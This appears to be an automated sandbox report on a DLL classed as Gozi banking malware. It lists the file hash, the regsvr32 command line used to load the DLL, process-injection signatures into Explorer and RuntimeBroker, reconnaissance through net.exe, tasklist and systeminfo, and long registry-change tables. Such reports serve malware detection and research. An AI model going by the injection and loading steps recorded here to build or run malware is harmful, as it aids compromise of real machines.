Analysis Overview
SHA256
ee46bd47dbd009333a72bc752b3d38d5a87a25f90fef3d4d77515d4fd11f3c8d
Threat Level: Known bad
The file 8fcfb8f38d8607c57f08f9b39139065f was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Enumerates processes with tasklist
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Gathers system information
Discovers systems in the same network
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-03 10:56
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-03 10:56
Reported
2022-08-03 10:58
Platform
win7-20220715-en
Max time kernel
87s
Max time network
44s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll
Network
Files
memory/1064-54-0x000007FEFC251000-0x000007FEFC253000-memory.dmp
memory/1660-55-0x0000000000000000-mapping.dmp
memory/1660-56-0x00000000760E1000-0x00000000760E3000-memory.dmp
memory/1660-57-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1660-62-0x00000000001A0000-0x00000000001AD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-03 10:56
Reported
2022-08-03 10:58
Platform
win10v2004-20220721-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
Gozi, Gozi IFSB
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1728 set thread context of 2588 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 2588 set thread context of 3396 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2588 set thread context of 3664 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2588 set thread context of 3520 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2588 set thread context of 4752 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6d898b3f779591c13da1f2b28ce32141fe3eb569a7d6f4a1152ba756aad77d00" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a94ab9e0a277a1865d03111cc1a70ac901b509c24bef77035af18ae5203b6e37" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e4a7ec7f38a7d8018c66ae9238a7d8018c66ae9238a7d801a67d08000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000316337343330316536313435343930633637333336316134356530633030393230643635323638333034323838616237653265306230666636373134613537620000b20009000400efbe03551a6703551a672e00000000000000000000000000000000000000000000000000b44ad300310063003700340033003000310065003600310034003500340039003000630036003700330033003600310061003400350065003000630030003000390032003000640036003500320036003800330030003400320038003800610062003700650032006500300062003000660066003600370031003400610035003700620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c31633734333031653631343534393063363733333631613435653063303039323064363532363833303432383861623765326530623066663637313461353762000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca590d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca590d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b987cab8-05db-4909- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\071ae30bc7365699d044a75ba8191e4d9c39200fc27b8565d88dae1ec87013d4" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = [binary value omitted] | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = e80b8e9238a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\80ce800c-4267-4baa- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = [binary value omitted] | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\1c74301e6145490c673361a45e0c00920d65268304288ab7e2e0b0ff6714a57b" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67746a65-1fa0-4632- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = 9c256d9238a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000008f7fe57f38a7d8018f66709238a7d8018f66709238a7d80114a80c000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000613934616239653061323737613138363564303331313163633161373061633930316235303963323462656637373033356166313861653532303362366533370000b20009000400efbe03551a6703551a672e000000000000000000000000000000000000000000000000003c95e100610039003400610062003900650030006100320037003700610031003800360035006400300033003100310031006300630031006100370030006100630039003000310062003500300039006300320034006200650066003700370030003300350061006600310038006100650035003200300033006200360065003300370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61393461623965306132373761313836356430333131316363316137306163393031623530396332346265663737303335616631386165353230336236653337000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca290d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca290d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = ffa4c19238a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = 449ce29238a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = b1d97d9238a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7df64d0b8ce57658894b87824f6c7365f089fc082206dc50325f02b2cbfacdea" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0d724897-1082-4cb9- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\bf9b381c0f6d6c6843c6e75b141b29022c99e5eaf9ba7bd4b11b59983bec26d6" | C:\Windows\System32\RuntimeBroker.exe | N/A |
